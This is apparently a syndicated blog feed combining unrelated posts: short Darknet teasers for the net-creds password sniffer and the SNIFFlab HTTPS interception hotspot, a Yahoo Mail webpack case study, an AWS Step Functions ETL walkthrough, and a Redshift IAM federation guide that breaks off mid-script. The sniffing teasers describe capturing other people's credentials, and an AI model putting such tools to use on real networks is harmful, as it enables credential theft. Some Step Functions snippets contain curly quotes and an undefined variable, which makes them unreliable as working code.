Features of net-creds for Sniffing Passwords

It can sniff the following directly from a network interface or from a PCAP file:

  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 all supported protocols: HTTP, SMB, LDAP, etc.

Read the rest of net-creds – Sniff Passwords From Interface or PCAP File now! Only available at Darknet.

How to Make Your Web App More Reliable and Performant Using webpack: a Yahoo Mail Case Study

Post Syndicated from mikesefanov original https://yahooeng.tumblr.com/post/168508200981

yahoodevelopers:

image

By Murali Krishna Bachhu, Anurag Damle, and Utkarsh Shrivastava

As engineers on the Yahoo Mail team at Oath, we pride ourselves on the things that matter most to developers: faster development cycles, more reliability, and better performance. Users don’t necessarily see these elements, but they certainly feel the difference they make when significant improvements are made. Recently, we were able to upgrade all three of these areas at scale by adopting webpack® as Yahoo Mail’s underlying module bundler, and you can do the same for your web application.

What is webpack?

webpack is an open source module bundler for modern JavaScript applications. When webpack processes your application, it recursively builds a dependency graph that includes every module your application needs. Then it packages all of those modules into a small number of bundles, often only one, to be loaded by the browser.

webpack became our choice module bundler not only because it supports on-demand loading, multiple bundle generation, and has a relatively low runtime overhead, but also because it is better suited for web platforms and NodeJS apps and has great community support.

image

Comparison of webpack to other open source bundlers


How did we integrate webpack?

Like any developer does when integrating a new module bundler, we started integrating webpack into Yahoo Mail by looking at its basic config file. We explored available default webpack plugins as well as third-party webpack plugins and then picked the plugins most suitable for our application. If we didn’t find a plugin that suited a specific need, we wrote the webpack plugin ourselves (e.g., We wrote a plugin to execute Atomic CSS scripts in the latest Yahoo Mail experience in order to decrease our overall CSS payload**).

During the development process for Yahoo Mail, we needed a way to make sure webpack would continuously run in the background. To make this happen, we decided to use the task runner Grunt. Not only does Grunt keep the connection to webpack alive, but it also gives us the ability to pass different parameters to the webpack config file based on the given environment. Some examples of these parameters are source map options, enabling HMR, and uglification.

Before deployment to production, we wanted to optimize the javascript bundles for size to make the Yahoo Mail experience faster. webpack provides good default support for this with the UglifyJS plugin. Although the default options are conservative, they give us the ability to configure the options. Once we modified the options to our specifications, we saved approximately 10KB.

image

Code snippet showing the configuration options for the UglifyJS plugin


Faster development cycles for developers

While developing a new feature, engineers ideally want to see their code changes reflected on their web app instantaneously. This allows them to maintain their train of thought and eventually results in more productivity. Before we implemented webpack, it took us around 30 seconds to 1 minute for changes to reflect on our Yahoo Mail development environment. webpack helped us reduce the wait time to 5 seconds.

More reliability

Consumers love a reliable product, where all the features work seamlessly every time. Before we began using webpack, we were generating javascript bundles on demand or during run-time, which meant the product was more prone to exceptions or failures while fetching the javascript bundles. With webpack, we now generate all the bundles during build time, which means that all the bundles are available whenever consumers access Yahoo Mail. This results in significantly fewer exceptions and failures and a better experience overall.

Better Performance

We were able to attain a significant reduction of payload after adopting webpack.

  1. Reduction of about 75 KB gzipped Javascript payload
  2. 50% reduction on server-side render time
  3. 10% improvement in Yahoo Mail’s launch performance metrics, as measured by render time above the fold (e.g., Time to load contents of an email).

Below are some charts that demonstrate the payload size of Yahoo Mail before and after implementing webpack.

image

Payload before using webpack (JavaScript Size = 741.41KB)


image

Payload after switching to webpack (JavaScript size = 669.08KB)


image

Conclusion

Shifting to webpack has resulted in significant improvements. We saw a common build process go from 30 seconds to 5 seconds, large JavaScript bundle size reductions, and a halving in server-side rendering time. In addition to these benefits, our engineers have found the community support for webpack to have been impressive as well. webpack has made the development of Yahoo Mail more efficient and enhanced the product for users. We believe you can use it to achieve similar results for your web application as well.

**Optimized CSS generation with Atomizer

Before we implemented webpack into the development of Yahoo Mail, we looked into how we could decrease our CSS payload. To achieve this, we developed an in-house solution for writing modular and scoped CSS in React. Our solution is similar to the Atomizer library, and our CSS is written in JavaScript like the example below:

image

Sample snippet of CSS written with Atomizer


Every React component creates its own styles.js file with required style definitions. React-Atomic-CSS converts these files into unique class definitions. Our total CSS payload after implementing our solution equaled all the unique style definitions in our code, or only 83KB (21KB gzipped).

During our migration to webpack, we created a custom plugin and loader to parse these files and extract the unique style definitions from all of our CSS files. Since this process is tied to bundling, only CSS files that are part of the dependency chain are included in the final CSS.

Implementing Dynamic ETL Pipelines Using AWS Step Functions

Post Syndicated from Tara Van Unen original https://aws.amazon.com/blogs/compute/implementing-dynamic-etl-pipelines-using-aws-step-functions/

This post contributed by:
Wangechi Dole, AWS Solutions Architect
Milan Krasnansky, ING, Digital Solutions Developer, SGK
Rian Mookencherry, Director – Product Innovation, SGK

Data processing and transformation is a common use case you see in our customer case studies and success stories. Often, customers deal with complex data from a variety of sources that needs to be transformed and customized through a series of steps to make it useful to different systems and stakeholders. This can be difficult due to the ever-increasing volume, velocity, and variety of data. Today, data management challenges cannot be solved with traditional databases.

Workflow automation helps you build solutions that are repeatable, scalable, and reliable. You can use AWS Step Functions for this. A great example is how SGK used Step Functions to automate the ETL processes for their client. With Step Functions, SGK has been able to automate changes within the data management system, substantially reducing the time required for data processing.

In this post, SGK shares the details of how they used Step Functions to build a robust data processing system based on highly configurable business transformation rules for ETL processes.

SGK: Building dynamic ETL pipelines

SGK is a subsidiary of Matthews International Corporation, a diversified organization focusing on brand solutions and industrial technologies. SGK’s Global Content Creation Studio network creates compelling content and solutions that connect brands and products to consumers through multiple assets including photography, video, and copywriting.

We were recently contracted to build a sophisticated and scalable data management system for one of our clients. We chose to build the solution on AWS to leverage advanced, managed services that help to improve the speed and agility of development.

The data management system served two main functions:

  1. Ingesting a large amount of complex data to facilitate both reporting and product funding decisions for the client’s global marketing and supply chain organizations.
  2. Processing the data through normalization and applying complex algorithms and data transformations. The system goal was to provide information in the relevant context—such as strategic marketing, supply chain, product planning, etc. —to the end consumer through automated data feeds or updates to existing ETL systems.

We were faced with several challenges:

  • Output data that needed to be refreshed at least twice a day to provide fresh datasets to both local and global markets. That constant data refresh posed several challenges, especially around data management and replication across multiple databases.
  • The complexity of reporting business rules that needed to be updated on a constant basis.
  • Data that could not be processed as contiguous blocks of typical time-series data. The measurement of the data was done across seasons (that is, combination of dates), which often resulted with up to three overlapping seasons at any given time.
  • Input data that came from 10+ different data sources. Each data source ranged from 1–20K rows with as many as 85 columns per input source.

These challenges meant that our small Dev team heavily invested time in frequent configuration changes to the system and data integrity verification to make sure that everything was operating properly. Maintaining this system proved to be a daunting task and that’s when we turned to Step Functions—along with other AWS services—to automate our ETL processes.

Solution overview

Our solution included the following AWS services:

  • AWS Step Functions: Before Step Functions was available, we were using multiple Lambda functions for this use case and running into memory limit issues. With Step Functions, we can execute steps in parallel simultaneously, in a cost-efficient manner, without running into memory limitations.
  • AWS Lambda: The Step Functions state machine uses Lambda functions to implement the Task states. Our Lambda functions are implemented in Java 8.
  • Amazon DynamoDB provides us with an easy and flexible way to manage business rules. We specify our rules as Keys. These are key-value pairs stored in a DynamoDB table.
  • Amazon RDS: Our ETL pipelines consume source data from our RDS MySQL database.
  • Amazon Redshift: We use Amazon Redshift for reporting purposes because it integrates with our BI tools. Currently we are using Tableau for reporting which integrates well with Amazon Redshift.
  • Amazon S3: We store our raw input files and intermediate results in S3 buckets.
  • Amazon CloudWatch Events: Our users expect results at a specific time. We use CloudWatch Events to trigger Step Functions on an automated schedule.

Solution architecture

This solution uses a declarative approach to defining business transformation rules that are applied by the underlying Step Functions state machine as data moves from RDS to Amazon Redshift. An S3 bucket is used to store intermediate results. A CloudWatch Event rule triggers the Step Functions state machine on a schedule. The following diagram illustrates our architecture:

Here are more details for the above diagram:

  1. A rule in CloudWatch Events triggers the state machine execution on an automated schedule.
  2. The state machine invokes the first Lambda function.
  3. The Lambda function deletes all existing records in Amazon Redshift. Depending on the dataset, the Lambda function can create a new table in Amazon Redshift to hold the data.
  4. The same Lambda function then retrieves Keys from a DynamoDB table. Keys represent specific marketing campaigns or seasons and map to specific records in RDS.
  5. The state machine executes the second Lambda function using the Keys from DynamoDB.
  6. The second Lambda function retrieves the referenced dataset from RDS. The records retrieved represent the entire dataset needed for a specific marketing campaign.
  7. The second Lambda function executes in parallel for each Key retrieved from DynamoDB and stores the output in CSV format temporarily in S3.
  8. Finally, the Lambda function uploads the data into Amazon Redshift.

To understand the above data processing workflow, take a closer look at the Step Functions state machine for this example.

We walk you through the state machine in more detail in the following sections.

Walkthrough

To get started, you need to:

  • Create a schedule in CloudWatch Events
  • Specify conditions for RDS data extracts
  • Create Amazon Redshift input files
  • Load data into Amazon Redshift

Step 1: Create a schedule in CloudWatch Events
Create rules in CloudWatch Events to trigger the Step Functions state machine on an automated schedule. The following is an example cron expression to automate your schedule:

In this example, the cron expression invokes the Step Functions state machine at 3:00am and 2:00pm (UTC) every day.

Step 2: Specify conditions for RDS data extracts
We use DynamoDB to store Keys that determine which rows of data to extract from our RDS MySQL database. An example Key is MCS2017, which stands for, Marketing Campaign Spring 2017. Each campaign has a specific start and end date and the corresponding dataset is stored in RDS MySQL. A record in RDS contains about 600 columns, and each Key can represent up to 20K records.

A given day can have multiple campaigns with different start and end dates running simultaneously. In the following example DynamoDB item, three campaigns are specified for the given date.

The state machine example shown above uses Keys 31, 32, and 33 in the first ChoiceState and Keys 21 and 22 in the second ChoiceState. These keys represent marketing campaigns for a given day. For example, on Monday, there are only two campaigns requested. The ChoiceState with Keys 21 and 22 is executed. If three campaigns are requested on Tuesday, for example, then ChoiceState with Keys 31, 32, and 33 is executed. MCS2017 can be represented by Key 21 and Key 33 on Monday and Tuesday, respectively. This approach gives us the flexibility to add or remove campaigns dynamically.

Step 3: Create Amazon Redshift input files
When the state machine begins execution, the first Lambda function is invoked as the resource for FirstState, represented in the Step Functions state machine as follows:

"Comment": ” AWS Amazon States Language.", 
  "StartAt": "FirstState",
 
"States": { 
  "FirstState": {
   
"Type": "Task",
   
"Resource": "arn:aws:lambda:xx-xxxx-x:XXXXXXXXXXXX:function:Start",
    "Next": "ChoiceState" 
  } 

As described in the solution architecture, the purpose of this Lambda function is to delete existing data in Amazon Redshift and retrieve keys from DynamoDB. In our use case, we found that deleting existing records was more efficient and less time-consuming than finding the delta and updating existing records. On average, an Amazon Redshift table can contain about 36 million cells, which translates to roughly 65K records. The following is the code snippet for the first Lambda function in Java 8:

public class LambdaFunctionHandler implements RequestHandler<Map<String,Object>,Map<String,String>> {
    Map<String,String> keys= new HashMap<>();
    public Map<String, String> handleRequest(Map<String, Object> input, Context context){
       Properties config = getConfig(); 
       // 1. Cleaning Redshift Database
       new RedshiftDataService(config).cleaningTable(); 
       // 2. Reading data from Dynamodb
       List<String> keyList = new DynamoDBDataService(config).getCurrentKeys();
       for(int i = 0; i < keyList.size(); i++) {
           keys.put(”key" + (i+1), keyList.get(i)); 
       }
       keys.put(”key" + T,String.valueOf(keyList.size()));
       // 3. Returning the key values and the key count from the “for” loop
       return (keys);
}

The following JSON represents ChoiceState.

"ChoiceState": {
   "Type" : "Choice",
   "Choices": [ 
   {

      "Variable": "$.keyT",
     "StringEquals": "3",
     "Next": "CurrentThreeKeys" 
   }, 
   {

     "Variable": "$.keyT",
    "StringEquals": "2",
    "Next": "CurrentTwooKeys" 
   } 
 ], 
 "Default": "DefaultState"
}

The variable $.keyT represents the number of keys retrieved from DynamoDB. This variable determines which of the parallel branches should be executed. At the time of publication, Step Functions does not support dynamic parallel state. Therefore, choices under ChoiceState are manually created and assigned hardcoded StringEquals values. These values represent the number of parallel executions for the second Lambda function.

For example, if $.keyT equals 3, the second Lambda function is executed three times in parallel with keys, $key1, $key2 and $key3 retrieved from DynamoDB. Similarly, if $.keyT equals two, the second Lambda function is executed twice in parallel.  The following JSON represents this parallel execution:

"CurrentThreeKeys": { 
  "Type": "Parallel",
  "Next": "NextState",
  "Branches": [ 
  {

     "StartAt": “key31",
    "States": { 
       “key31": {

          "Type": "Task",
        "InputPath": "$.key1",
        "Resource": "arn:aws:lambda:xx-xxxx-x:XXXXXXXXXXXX:function:Execution",
        "End": true 
       } 
    } 
  }, 
  {

     "StartAt": “key32",
    "States": { 
     “key32": {

        "Type": "Task",
       "InputPath": "$.key2",
         "Resource": "arn:aws:lambda:xx-xxxx-x:XXXXXXXXXXXX:function:Execution",
       "End": true 
      } 
     } 
   }, 
   {

      "StartAt": “key33",
       "States": { 
          “key33": {

                "Type": "Task",
             "InputPath": "$.key3",
             "Resource": "arn:aws:lambda:xx-xxxx-x:XXXXXXXXXXXX:function:Execution",
           "End": true 
       } 
     } 
    } 
  ] 
} 

Step 4: Load data into Amazon Redshift
The second Lambda function in the state machine extracts records from RDS associated with keys retrieved for DynamoDB. It processes the data then loads into an Amazon Redshift table. The following is code snippet for the second Lambda function in Java 8.

public class LambdaFunctionHandler implements RequestHandler<String, String> {
 public static String key = null;

public String handleRequest(String input, Context context) { 
   key=input; 
   //1. Getting basic configurations for the next classes + s3 client Properties
   config = getConfig();

   AmazonS3 s3 = AmazonS3ClientBuilder.defaultClient(); 
   // 2. Export query results from RDS into S3 bucket 
   new RdsDataService(config).exportDataToS3(s3,key); 
   // 3. Import query results from S3 bucket into Redshift 
    new RedshiftDataService(config).importDataFromS3(s3,key); 
   System.out.println(input); 
   return "SUCCESS"; 
 } 
}

After the data is loaded into Amazon Redshift, end users can visualize it using their preferred business intelligence tools.

Lessons learned

  • At the time of publication, the 1.5–GB memory hard limit for Lambda functions was inadequate for processing our complex workload. Step Functions gave us the flexibility to chunk our large datasets and process them in parallel, saving on costs and time.
  • In our previous implementation, we assigned each key a dedicated Lambda function along with CloudWatch rules for schedule automation. This approach proved to be inefficient and quickly became an operational burden. Previously, we processed each key sequentially, with each key adding about five minutes to the overall processing time. For example, processing three keys meant that the total processing time was three times longer. With Step Functions, the entire state machine executes in about five minutes.
  • Using DynamoDB with Step Functions gave us the flexibility to manage keys efficiently. In our previous implementations, keys were hardcoded in Lambda functions, which became difficult to manage due to frequent updates. DynamoDB is a great way to store dynamic data that changes frequently, and it works perfectly with our serverless architectures.

Conclusion

With Step Functions, we were able to fully automate the frequent configuration updates to our dataset resulting in significant cost savings, reduced risk to data errors due to system downtime, and more time for us to focus on new product development rather than support related issues. We hope that you have found the information useful and that it can serve as a jump-start to building your own ETL processes on AWS with managed AWS services.

For more information about how Step Functions makes it easy to coordinate the components of distributed applications and microservices in any workflow, see the use case examples and then build your first state machine in under five minutes in the Step Functions console.

If you have questions or suggestions, please comment below.

SNIFFlab – Create Your Own MITM Test Environment

Post Syndicated from Darknet original https://www.darknet.org.uk/2017/11/snifflab-create-mitm-test-environment/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

SNIFFlab – Create Your Own MITM Test Environment

SNIFFlab is a set of scripts in Python that enable you to create your own MITM test environment for packet sniffing through a WiFi access point.

Essentially it’s a WiFi hotspot that is continually collecting all the packets transmitted across it. All connected clients’ HTTPS communications are subjected to a “Man-in-the-middle” attack, whereby they can later be decrypted for analysis

What is SNIFFLab MITM Test Environment

In our environment, dubbed Snifflab, a researcher simply connects to the Snifflab WiFi network, is prompted to install a custom certificate authority on the device, and then can use their device as needed for the test.

Read the rest of SNIFFlab – Create Your Own MITM Test Environment now! Only available at Darknet.

Federate Database User Authentication Easily with IAM and Amazon Redshift

Post Syndicated from Thiyagarajan Arumugam original https://aws.amazon.com/blogs/big-data/federate-database-user-authentication-easily-with-iam-and-amazon-redshift/

Managing database users though federation allows you to manage authentication and authorization procedures centrally. Amazon Redshift now supports database authentication with IAM, enabling user authentication though enterprise federation. No need to manage separate database users and passwords to further ease the database administration. You can now manage users outside of AWS and authenticate them for access to an Amazon Redshift data warehouse. Do this by integrating IAM authentication and a third-party SAML-2.0 identity provider (IdP), such as AD FS, PingFederate, or Okta. In addition, database users can also be automatically created at their first login based on corporate permissions.

In this post, I demonstrate how you can extend the federation to enable single sign-on (SSO) to the Amazon Redshift data warehouse.

SAML and Amazon Redshift

AWS supports Security Assertion Markup Language (SAML) 2.0, which is an open standard for identity federation used by many IdPs. SAML enables federated SSO, which enables your users to sign in to the AWS Management Console. Users can also make programmatic calls to AWS API actions by using assertions from a SAML-compliant IdP. For example, if you use Microsoft Active Directory for corporate directories, you may be familiar with how Active Directory and AD FS work together to enable federation. For more information, see the Enabling Federation to AWS Using Windows Active Directory, AD FS, and SAML 2.0 AWS Security Blog post.

Amazon Redshift now provides the GetClusterCredentials API operation that allows you to generate temporary database user credentials for authentication. You can set up an IAM permissions policy that generates these credentials for connecting to Amazon Redshift. Extending the IAM authentication, you can configure the federation of AWS access though a SAML 2.0–compliant IdP. An IAM role can be configured to permit the federated users call the GetClusterCredentials action and generate temporary credentials to log in to Amazon Redshift databases. You can also set up policies to restrict access to Amazon Redshift clusters, databases, database user names, and user group.

Amazon Redshift federation workflow

In this post, I demonstrate how you can use a JDBC– or ODBC-based SQL client to log in to the Amazon Redshift cluster using this feature. The SQL clients used with Amazon Redshift JDBC or ODBC drivers automatically manage the process of calling the GetClusterCredentials action, retrieving the database user credentials, and establishing a connection to your Amazon Redshift database. You can also use your database application to programmatically call the GetClusterCredentials action, retrieve database user credentials, and connect to the database. I demonstrate these features using an example company to show how different database users accounts can be managed easily using federation.

The following diagram shows how the SSO process works:

  1. JDBC/ODBC
  2. Authenticate using Corp Username/Password
  3. IdP sends SAML assertion
  4. Call STS to assume role with SAML
  5. STS Returns Temp Credentials
  6. Use Temp Credentials to get Temp cluster credentials
  7. Connect to Amazon Redshift using temp credentials

Walkthrough

Example Corp. is using Active Directory (idp host:demo.examplecorp.com) to manage federated access for users in its organization. It has an AWS account: 123456789012 and currently manages an Amazon Redshift cluster with the cluster ID “examplecorp-dw”, database “analytics” in us-west-2 region for its Sales and Data Science teams. It wants the following access:

  • Sales users can access the examplecorp-dw cluster using the sales_grp database group
  • Sales users access examplecorp-dw through a JDBC-based SQL client
  • Sales users access examplecorp-dw through an ODBC connection, for their reporting tools
  • Data Science users access the examplecorp-dw cluster using the data_science_grp database group.
  • Partners access the examplecorp-dw cluster and query using the partner_grp database group.
  • Partners are not federated through Active Directory and are provided with separate IAM user credentials (with IAM user name examplecorpsalespartner).
  • Partners can connect to the examplecorp-dw cluster programmatically, using language such as Python.
  • All users are automatically created in Amazon Redshift when they log in for the first time.
  • (Optional) Internal users do not specify database user or group information in their connection string. It is automatically assigned.
  • Data warehouse users can use SSO for the Amazon Redshift data warehouse using the preceding permissions.

Step 1:  Set up IdPs and federation

The Enabling Federation to AWS Using Windows Active Directory post demonstrated how to prepare Active Directory and enable federation to AWS. Using those instructions, you can establish trust between your AWS account and the IdP and enable user access to AWS using SSO.  For more information, see Identity Providers and Federation.

For this walkthrough, assume that this company has already configured SSO to their AWS account: 123456789012 for their Active Directory domain demo.examplecorp.com. The Sales and Data Science teams are not required to specify database user and group information in the connection string. The connection string can be configured by adding SAML Attribute elements to your IdP. Configuring these optional attributes enables internal users to conveniently avoid providing the DbUser and DbGroup parameters when they log in to Amazon Redshift.

The user-name attribute can be set up as follows, with a user ID (for example, nancy) or an email address (for example. [email protected]):

<Attribute Name="https://redshift.amazon.com/SAML/Attributes/DbUser">  
  <AttributeValue>user-name</AttributeValue>
</Attribute>

The AutoCreate attribute can be defined as follows:

<Attribute Name="https://redshift.amazon.com/SAML/Attributes/AutoCreate">
    <AttributeValue>true</AttributeValue>
</Attribute>

The sales_grp database group can be included as follows:

<Attribute Name="https://redshift.amazon.com/SAML/Attributes/DbGroups">
    <AttributeValue>sales_grp</AttributeValue>
</Attribute>

For more information about attribute element configuration, see Configure SAML Assertions for Your IdP.

Step 2: Create IAM roles for access to the Amazon Redshift cluster

The next step is to create IAM policies with permissions to call GetClusterCredentials and provide authorization for Amazon Redshift resources. To grant a SQL client the ability to retrieve the cluster endpoint, region, and port automatically, include the redshift:DescribeClusters action with the Amazon Redshift cluster resource in the IAM role.  For example, users can connect to the Amazon Redshift cluster using a JDBC URL without the need to hardcode the Amazon Redshift endpoint:

Previous:  jdbc:redshift://endpoint:port/database

Current:  jdbc:redshift:iam://clustername:region/dbname

Use IAM to create the following policies. You can also use an existing user or role and assign these policies. For example, if you already created an IAM role for IdP access, you can attach the necessary policies to that role. Here is the policy created for sales users for this example:

Sales_DW_IAM_Policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "redshift:DescribeClusters"
            ],
            "Resource": [
                "arn:aws:redshift:us-west-2:123456789012:cluster:examplecorp-dw"
            ]
        },
        {
            "Effect": "Allow",
            "Action": [
                "redshift:GetClusterCredentials"
            ],
            "Resource": [
                "arn:aws:redshift:us-west-2:123456789012:cluster:examplecorp-dw",
                "arn:aws:redshift:us-west-2:123456789012:dbuser:examplecorp-dw/${redshift:DbUser}"
            ],
            "Condition": {
                "StringEquals": {
                    "aws:userid": "AIDIODR4TAW7CSEXAMPLE:${redshift:DbUser}@examplecorp.com"
                }
            }
        },
        {
            "Effect": "Allow",
            "Action": [
                "redshift:CreateClusterUser"
            ],
            "Resource": [
                "arn:aws:redshift:us-west-2:123456789012:dbuser:examplecorp-dw/${redshift:DbUser}"
            ]
        },
        {
            "Effect": "Allow",
            "Action": [
                "redshift:JoinGroup"
            ],
            "Resource": [
                "arn:aws:redshift:us-west-2:123456789012:dbgroup:examplecorp-dw/sales_grp"
            ]
        }
    ]
}

The policy uses the following parameter values:

  • Region: us-west-2
  • AWS Account: 123456789012
  • Cluster name: examplecorp-dw
  • Database group: sales_grp
  • IAM role: AIDIODR4TAW7CSEXAMPLE
Policy Statement Description
{
"Effect":"Allow",
"Action":[
"redshift:DescribeClusters"
],
"Resource":[
"arn:aws:redshift:us-west-2:123456789012:cluster:examplecorp-dw"
]
}

Allow users to retrieve the cluster endpoint, region, and port automatically for the Amazon Redshift cluster examplecorp-dw. This specification uses the resource format arn:aws:redshift:region:account-id:cluster:clustername. For example, the SQL client JDBC can be specified in the format jdbc:redshift:iam://clustername:region/dbname.

For more information, see Amazon Resource Names.

{
"Effect":"Allow",
"Action":[
"redshift:GetClusterCredentials"
],
"Resource":[
"arn:aws:redshift:us-west-2:123456789012:cluster:examplecorp-dw",
"arn:aws:redshift:us-west-2:123456789012:dbuser:examplecorp-dw/${redshift:DbUser}"
],
"Condition":{
"StringEquals":{
"aws:userid":"AIDIODR4TAW7CSEXAMPLE:${redshift:DbUser}@examplecorp.com"
}
}
}

Generates a temporary token to authenticate into the examplecorp-dw cluster. “arn:aws:redshift:us-west-2:123456789012:dbuser:examplecorp-dw/${redshift:DbUser}” restricts the corporate user name to the database user name for that user. This resource is specified using the format: arn:aws:redshift:region:account-id:dbuser:clustername/dbusername.

The Condition block enforces that the AWS user ID should match “AIDIODR4TAW7CSEXAMPLE:${redshift:DbUser}@examplecorp.com”, so that individual users can authenticate only as themselves. The AIDIODR4TAW7CSEXAMPLE role has the Sales_DW_IAM_Policy policy attached.

{
"Effect":"Allow",
"Action":[
"redshift:CreateClusterUser"
],
"Resource":[
"arn:aws:redshift:us-west-2:123456789012:dbuser:examplecorp-dw/${redshift:DbUser}"
]
}
Automatically creates database users in examplecorp-dw, when they log in for the first time. Subsequent logins reuse the existing database user.
{
"Effect":"Allow",
"Action":[
"redshift:JoinGroup"
],
"Resource":[
"arn:aws:redshift:us-west-2:123456789012:dbgroup:examplecorp-dw/sales_grp"
]
}
Allows sales users to join the sales_grp database group through the resource “arn:aws:redshift:us-west-2:123456789012:dbgroup:examplecorp-dw/sales_grp” that is specified in the format arn:aws:redshift:region:account-id:dbgroup:clustername/dbgroupname.

Similar policies can be created for Data Science users with access to join the data_science_grp group in examplecorp-dw. You can now attach the Sales_DW_IAM_Policy policy to the role that is mapped to IdP application for SSO.
 For more information about how to define the claim rules, see Configuring SAML Assertions for the Authentication Response.

Because partners are not authorized using Active Directory, they are provided with IAM credentials and added to the partner_grp database group. The Partner_DW_IAM_Policy is attached to the IAM users for partners. The following policy allows partners to log in using the IAM user name as the database user name.

Partner_DW_IAM_Policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "redshift:DescribeClusters"
            ],
            "Resource": [
                "arn:aws:redshift:us-west-2:123456789012:cluster:examplecorp-dw"
            ]
        },
        {
            "Effect": "Allow",
            "Action": [
                "redshift:GetClusterCredentials"
            ],
            "Resource": [
                "arn:aws:redshift:us-west-2:123456789012:cluster:examplecorp-dw",
                "arn:aws:redshift:us-west-2:123456789012:dbuser:examplecorp-dw/${redshift:DbUser}"
            ],
            "Condition": {
                "StringEquals": {
                    "redshift:DbUser": "${aws:username}"
                }
            }
        },
        {
            "Effect": "Allow",
            "Action": [
                "redshift:CreateClusterUser"
            ],
            "Resource": [
                "arn:aws:redshift:us-west-2:123456789012:dbuser:examplecorp-dw/${redshift:DbUser}"
            ]
        },
        {
            "Effect": "Allow",
            "Action": [
                "redshift:JoinGroup"
            ],
            "Resource": [
                "arn:aws:redshift:us-west-2:123456789012:dbgroup:examplecorp-dw/partner_grp"
            ]
        }
    ]
}

redshift:DbUser“: “${aws:username}” forces an IAM user to use the IAM user name as the database user name.

With the previous steps configured, you can now establish the connection to Amazon Redshift through JDBC– or ODBC-supported clients.

Step 3: Set up database user access

Before you start connecting to Amazon Redshift using the SQL client, set up the database groups for appropriate data access. Log in to your Amazon Redshift database as superuser to create a database group, using CREATE GROUP.

Log in to examplecorp-dw/analytics as superuser and create the following groups and users:

CREATE GROUP sales_grp;
CREATE GROUP datascience_grp;
CREATE GROUP partner_grp;

Use the GRANT command to define access permissions to database objects (tables/views) for the preceding groups.

Step 4: Connect to Amazon Redshift using the JDBC SQL client

Assume that sales user “nancy” is using the SQL Workbench client and JDBC driver to log in to the Amazon Redshift data warehouse. The following steps help set up the client and establish the connection:

  1. Download the latest Amazon Redshift JDBC driver from the Configure a JDBC Connection page
  2. Build the JDBC URL with the IAM option in the following format:
    jdbc:redshift:iam://examplecorp-dw:us-west-2/sales_db

Because the redshift:DescribeClusters action is assigned to the preceding IAM roles, it automatically resolves the cluster endpoints and the port. Otherwise, you can specify the endpoint and port information in the JDBC URL, as described in Configure a JDBC Connection.

Identify the following JDBC options for providing the IAM credentials (see the “Prepare your environment” section) and configure in the SQL Workbench Connection Profile:

plugin_name=com.amazon.redshift.plugin.AdfsCredentialsProvider 
idp_host=demo.examplecorp.com (The name of the corporate identity provider host)
idp_port=443  (The port of the corporate identity provider host)
user=examplecorp\nancy(corporate user name)
password=***(corporate user password)

The SQL workbench configuration looks similar to the following screenshot:

Now, “nancy” can connect to examplecorp-dw by authenticating using the corporate Active Directory. Because the SAML attributes elements are already configured for nancy, she logs in as database user nancy and is assigned the sales_grp. Similarly, other Sales and Data Science users can connect to the examplecorp-dw cluster. A custom Amazon Redshift ODBC driver can also be used to connect using a SQL client. For more information, see Configure an ODBC Connection.

Step 5: Connecting to Amazon Redshift using JDBC SQL Client and IAM Credentials

This optional step is necessary only when you want to enable users that are not authenticated with Active Directory. Partners are provided with IAM credentials that they can use to connect to the examplecorp-dw Amazon Redshift clusters. These IAM users are attached to Partner_DW_IAM_Policy that assigns them to be assigned to the public database group in Amazon Redshift. The following JDBC URLs enable them to connect to the Amazon Redshift cluster:

jdbc:redshift:iam//examplecorp-dw/analytics?AccessKeyID=XXX&SecretAccessKey=YYY&DbUser=examplecorpsalespartner&DbGroup= partner_grp&AutoCreate=true

The AutoCreate option automatically creates a new database user the first time the partner logs in. There are several other options available to conveniently specify the IAM user credentials. For more information, see Options for providing IAM credentials.

Step 6: Connecting to Amazon Redshift using an ODBC client for Microsoft Windows

Assume that another sales user “uma” is using an ODBC-based client to log in to the Amazon Redshift data warehouse using Example Corp Active Directory. The following steps help set up the ODBC client and establish the Amazon Redshift connection in a Microsoft Windows operating system connected to your corporate network:

  1. Download and install the latest Amazon Redshift ODBC driver.
  2. Create a system DSN entry.
    1. In the Start menu, locate the driver folder or folders:
      • Amazon Redshift ODBC Driver (32-bit)
      • Amazon Redshift ODBC Driver (64-bit)
      • If you installed both drivers, you have a folder for each driver.
    2. Choose ODBC Administrator, and then type your administrator credentials.
    3. To configure the driver for all users on the computer, choose System DSN. To configure the driver for your user account only, choose User DSN.
    4. Choose Add.
  3. Select the Amazon Redshift ODBC driver, and choose Finish. Configure the following attributes:
    Data Source Name =any friendly name to identify the ODBC connection 
    Database=analytics
    user=uma(corporate user name)
    Auth Type-Identity Provider: AD FS
    password=leave blank (Windows automatically authenticates)
    Cluster ID: examplecorp-dw
    idp_host=demo.examplecorp.com (The name of the corporate IdP host)

This configuration looks like the following:

  1. Choose OK to save the ODBC connection.
  2. Verify that uma is set up with the SAML attributes, as described in the “Set up IdPs and federation” section.

The user uma can now use this ODBC connection to establish the connection to the Amazon Redshift cluster using any ODBC-based tools or reporting tools such as Tableau. Internally, uma authenticates using the Sales_DW_IAM_Policy  IAM role and is assigned the sales_grp database group.

Step 7: Connecting to Amazon Redshift using Python and IAM credentials

To enable partners, connect to the examplecorp-dw cluster programmatically, using Python on a computer such as Amazon EC2 instance. Reuse the IAM users that are attached to the Partner_DW_IAM_Policy policy defined in Step 2.

The following steps show this set up on an EC2 instance:

  1. Launch a new EC2 instance with the Partner_DW_IAM_Policy role, as described in Using an IAM Role to Grant Permissions to Applications Running on Amazon EC2 Instances. Alternatively, you can attach an existing IAM role to an EC2 instance.
  2. This example uses Python PostgreSQL Driver (PyGreSQL) to connect to your Amazon Redshift clusters. To install PyGreSQL on Amazon Linux, use the following command as the ec2-user:
    sudo easy_install pip
    sudo yum install postgresql postgresql-devel gcc python-devel
    sudo pip install PyGreSQL

  1. The following code snippet demonstrates programmatic access to Amazon Redshift for partner users:
    #!/usr/bin/env python
    """
    Usage:
    python redshift-unload-copy.py <config file> <region>
    
    * Copyright 2014, Amazon.com, Inc. or its affiliates. All Rights Reserved.
    *
